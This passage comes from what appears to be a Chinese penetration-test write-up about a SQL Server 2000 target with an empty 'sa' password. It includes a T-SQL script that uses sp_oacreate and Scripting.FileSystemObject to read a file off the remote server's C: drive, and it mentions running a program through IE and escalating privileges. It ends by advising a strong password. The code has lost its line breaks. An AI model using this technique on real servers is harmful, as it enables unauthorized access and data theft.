在sql server的查询分析器里面我们在远程执行这个脚本,成功以后我们就可以利用ie去远程的服务器上调用这个文件来执行里面的程序。
ie执行成功以后,我们再利用另外一个sql脚本来查看结果。
-- scripting.filesystemobject example - read a known filedeclare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate ''scripting.filesystemobject'', @o outexec sp_oamethod @o, ''opentextfile'', @f out, ''c:\i0.sys'', 1exec @ret = sp_oamethod @f, ''readline'', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, ''readline'', @line outend |
ok,我们可以从sql server中远程看到对方服务器的c盘文件列表了,当然你还可以做很多其他的事情,比如提升你的权限等等。但是做为远程渗透服务测试来说,我们已经圆满的完成了客户的要求。
事后分析来看对方的网络管理员其实对服务器做了很多配置,所以留下这个sa的空口令可能是因为一些其他的原因,我们知道sql server2000安装的时候其实是没有这个空口令问题的,客户可能是由于内部客户端的一些使用上的原因而留下的这个问题,我已经建议客户去给数据库一个强壮的口令以解决这个问题了。
